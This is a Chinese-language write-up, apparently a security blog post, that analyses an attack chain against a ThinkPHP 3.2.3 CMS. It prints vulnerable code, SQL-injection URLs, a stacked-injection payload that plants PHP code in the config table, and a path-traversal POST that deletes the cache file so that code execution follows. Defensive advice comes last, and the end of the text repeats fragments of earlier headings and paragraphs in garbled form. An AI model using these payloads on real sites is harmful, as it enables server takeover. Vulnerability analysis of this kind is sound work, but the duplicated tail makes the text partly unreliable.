ThinkPHP 3.2.3 供应链攻击实战分析<\/h1>

前言<\/h2>
本文详细分析一个针对ThinkPHP 3.2.3框架CMS系统的供应链攻击案例，攻击者通过SQL注入、缓存漏洞和文件删除漏洞的组合利用，最终实现了系统控制。该CMS在互联网上有300+站点使用，具有广泛影响。<\/p>

漏洞环境<\/h2>

框架版本：ThinkPHP 3.2.3<\/li>
漏洞类型：SQL注入 + 缓存漏洞 + 文件删除漏洞<\/li>

攻击链：SQL注入 → 插入恶意数据 → 删除缓存 → 触发缓存生成 → 获取Shell<\/li> <\/ul>

漏洞分析<\/h2>

1. SQL注入漏洞<\/h3>

1.1 find()方法注入<\/h4>

在ThinkPHP 3.2.3中，find()<\/code>、select()<\/code>、delete()<\/code>等方法可能存在SQL注入。审计发现以下代码：<\/p>

function<\/span> getPosition<\/span>($catid) {
<\/span><\/span>    $cate =<\/span> M<\/span>('category'<\/span>)-><\/span>find<\/span>($catid);
<\/span><\/span>    $pos_id =<\/span> array<\/span>(['id'<\/span> =><\/span> $catid, 'name'<\/span> =><\/span> $cate['name'<\/span>]]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>find()<\/code>方法直接使用未过滤的$catid<\/code>参数，存在SQL注入。<\/p>
1.2 调用链分析<\/h4>
public<\/span> function<\/span> position<\/span>() {
<\/span><\/span>    $pos =<\/span> getPosition<\/span>(I<\/span>('get.catid'<\/span>));
<\/span><\/span>    $this-><\/span>pos<\/span> =<\/span> $pos;
<\/span><\/span>    $this-><\/span>display<\/span>('Public:position'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击URL：<\/p>
\/index.php?s=\/Cn\/public\/position&catid[where]=11111
<\/code><\/pre>
1.3 利用限制<\/h4>
虽然可以通过注入获取数据，但后台密码加密无法解密，需要寻找其他利用方式。<\/p>
2. 缓存漏洞<\/h3>
2.1 S()函数漏洞<\/h4>
ThinkPHP 3.2.3的S()<\/code>缓存函数存在漏洞：<\/p>
public<\/span> function<\/span> test02<\/span>() {
<\/span><\/span>    S<\/span>('name'<\/span>, "<\/span>\n<\/span>phpinfo();\/\/"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>当第二个参数可控时，可写入恶意代码到缓存文件。<\/p>
2.2 缓存数据来源<\/h4>
发现setConfig<\/code>函数通过数据库数据设置缓存：<\/p>
function<\/span> setConfig<\/span>($name =<\/span> 'ALL_CONFIG'<\/span>, $siteid =<\/span> array<\/span>()) {
<\/span><\/span>    $config =<\/span> M<\/span>('Config'<\/span>);
<\/span><\/span>    $where['status'<\/span>] =<\/span> 1<\/span>;
<\/span><\/span>    if<\/span>(!<\/span>empty<\/span>($siteid)) {
<\/span><\/span>        $where['siteid'<\/span>] =<\/span> array<\/span>('in'<\/span>, $siteid);
<\/span><\/span>    }
<\/span><\/span>    $data =<\/span> $config-><\/span>field<\/span>('id,name,title,value'<\/span>)-><\/span>where<\/span>($where)-><\/span>order<\/span>('sort ASC'<\/span>)-><\/span>select<\/span>();
<\/span><\/span>    
<\/span><\/span>    $cache_data =<\/span> array<\/span>();
<\/span><\/span>    if<\/span>(!<\/span>empty<\/span>($data)) {
<\/span><\/span>        foreach<\/span>($data as<\/span> $key =><\/span> $value) {
<\/span><\/span>            $cache_data[$value['name'<\/span>]] =<\/span> $value['value'<\/span>];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    S<\/span>($name, $cache_data);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.3 调用时机<\/h4>
在CommonController<\/code>的_initialize<\/code>方法中调用：<\/p>
public<\/span> function<\/span> _initialize<\/span>() {
<\/span><\/span>    $system_config =<\/span> S<\/span>('ALL_CONFIG'<\/span> .<\/span> C<\/span>('SITEID'<\/span>));
<\/span><\/span>    if<\/span>(empty<\/span>($system_config)) {
<\/span><\/span>        setConfig<\/span>('ALL_CONFIG'<\/span> .<\/span> C<\/span>('SITEID'<\/span>), array<\/span>(0<\/span>, C<\/span>('SITEID'<\/span>)));
<\/span><\/span>        $system_config =<\/span> S<\/span>('ALL_CONFIG'<\/span> .<\/span> C<\/span>('SITEID'<\/span>));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>缓存文件路径为Apps\Runtime\Temp\94b4e91cbccc674ec30f286e193c1703.php<\/code>（ALL_CONFIG1的MD5）<\/p>
3. 任意文件删除漏洞<\/h3>
3.1 漏洞位置<\/h4>
在UeditorController<\/code>中发现文件删除功能：<\/p>
public<\/span> function<\/span> delFile<\/span>() {
<\/span><\/span>    if<\/span>(IS_POST<\/span>){
<\/span><\/span>        $filename =<\/span>I<\/span>("filename"<\/span>);
<\/span><\/span>        if<\/span>(!<\/span>$filename){
<\/span><\/span>            $this-><\/span>ajaxReturn<\/span>(array<\/span>("status"<\/span>=><\/span>0<\/span>,"msg"<\/span>=><\/span>"文件不存在"<\/span>));
<\/span><\/span>        }
<\/span><\/span>        $type =<\/span>I<\/span>("post.type"<\/span>);
<\/span><\/span>        $data_path =<\/span> $this-><\/span>data_path<\/span>;
<\/span><\/span>        if<\/span>($type ==<\/span> 1<\/span>){
<\/span><\/span>            $data_path =<\/span> $this-><\/span>data_path<\/span>.<\/span>I<\/span>("post.dirname"<\/span>).<\/span>"\/"<\/span>;
<\/span><\/span>        }
<\/span><\/span>        $dir =<\/span> $data_path .<\/span> $filename;
<\/span><\/span>        if<\/span>(is_file<\/span>($dir)){
<\/span><\/span>            $ok =<\/span>unlink<\/span>($dir);
<\/span><\/span>            if<\/span>($ok){
<\/span><\/span>                $this-><\/span>ajaxReturn<\/span>(array<\/span>("status"<\/span>=><\/span>1<\/span>,"msg"<\/span>=><\/span>"删除成功"<\/span>));
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.2 利用方式<\/h4>
通过构造路径可以删除任意文件：<\/p>
filename=..\/..\/Apps\/Runtime\/Temp\/94b4e91cbccc674ec30f286e193c1703.php
<\/code><\/pre>
攻击链构建<\/h2>
1. 利用堆叠注入插入恶意数据<\/h3>
ThinkPHP 3.2.3使用PDO驱动，默认支持多语句查询，可利用堆叠注入：<\/p>
\/<\/span>index<\/span>.php?<\/span>s=\/<\/span>Cn\/<\/span>public<\/span>\/<\/span>position<\/span>&<\/span>catid[where<\/span>]=<\/span>11111<\/span>;insert<\/span>+<\/span>into<\/span>+<\/span>yongsy_config(name,value)+<\/span>values<\/span>('1'<\/span>,'511111222222111111333333\r\necho+md5(11);\/*'<\/span>)%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre>插入的value值包含换行和PHP代码注释，确保生成的缓存文件包含可执行代码。<\/p>
2. 删除现有缓存文件<\/h3>
利用任意文件删除漏洞清除现有缓存：<\/p>
POST \/index.php?s=xxlogin\/ueditor\/delFile
filename=..\/..\/Apps\/Runtime\/Temp\/94b4e91cbccc674ec30f286e193c1703.php
<\/code><\/pre>
3. 触发缓存生成<\/h3>
访问任意页面触发_initialize<\/code>方法，重新生成缓存文件。<\/p>
4. 访问恶意缓存文件<\/h3>
生成的缓存文件路径为：<\/p>
\/Apps\/Runtime\/Temp\/94b4e91cbccc674ec30f286e193c1703.php
<\/code><\/pre>
访问该文件即可执行插入的恶意代码。<\/p>
防御建议<\/h2>

输入过滤<\/strong>：对所有用户输入进行严格过滤，特别是数据库操作参数<\/li>
禁用堆叠查询<\/strong>：配置PDO禁用多语句查询（PDO::MYSQL_ATTR_MULTI_STATEMENTS => false<\/code>）<\/li>
缓存安全<\/strong>：

对缓存内容进行安全检查<\/li>
限制缓存文件的可执行权限<\/li>
<\/ul>
<\/li>
文件操作安全<\/strong>：

限制文件删除功能的目录范围<\/li>
对用户提供的文件名进行严格校验<\/li>
<\/ul>
<\/li>
框架升级<\/strong>：升级到更高版本的ThinkPHP，修复已知漏洞<\/li>
<\/ol>
总结<\/h2>
本案例展示了如何通过组合利用多个漏洞实现系统入侵：<\/p>

利用SQL注入插入恶意数据<\/li>
利用文件删除漏洞清除现有缓存<\/li>
触发系统重新生成包含恶意代码的缓存文件<\/li>
通过访问缓存文件获取系统控制权<\/li>
<\/ol>
这种攻击方式对使用ThinkPHP 3.2.3的CMS系统具有普遍威胁，开发人员应重视供应链安全，及时更新框架版本并实施严格的安全措施。<\/p>

ThinkPHP 3.2.3 供应链攻击实战分析<\/h1>

前言<\/h2> 本文详细分析一个针对ThinkPHP 3.2.3框架CMS系统的供应链攻击案例，攻击者通过SQL注入、缓存漏洞和文件删除漏洞的组合利用，最终实现了系统控制。该CMS在互联网上有300+站点使用，具有广泛影响。<\/p>

漏洞分析<\/h2>

1. SQL注入漏洞<\/h3>

1.3 利用限制<\/h4> 虽然可以通过注入获取数据，但后台密码加密无法解密，需要寻找其他利用方式。<\/p>

2. 缓存漏洞<\/h3>

攻击链构建<\/h2>

3. 触发缓存生成<\/h3> 访问任意页面触发_initialize<\/code>方法，重新生成缓存文件。<\/p>

前言<\/h2>
本文详细分析一个针对ThinkPHP 3.2.3框架CMS系统的供应链攻击案例，攻击者通过SQL注入、缓存漏洞和文件删除漏洞的组合利用，最终实现了系统控制。该CMS在互联网上有300+站点使用，具有广泛影响。<\/p>

1.3 利用限制<\/h4>
虽然可以通过注入获取数据，但后台密码加密无法解密，需要寻找其他利用方式。<\/p>

3. 触发缓存生成<\/h3>
访问任意页面触发`_initialize<\/code>方法，重新生成缓存文件。<\/p>`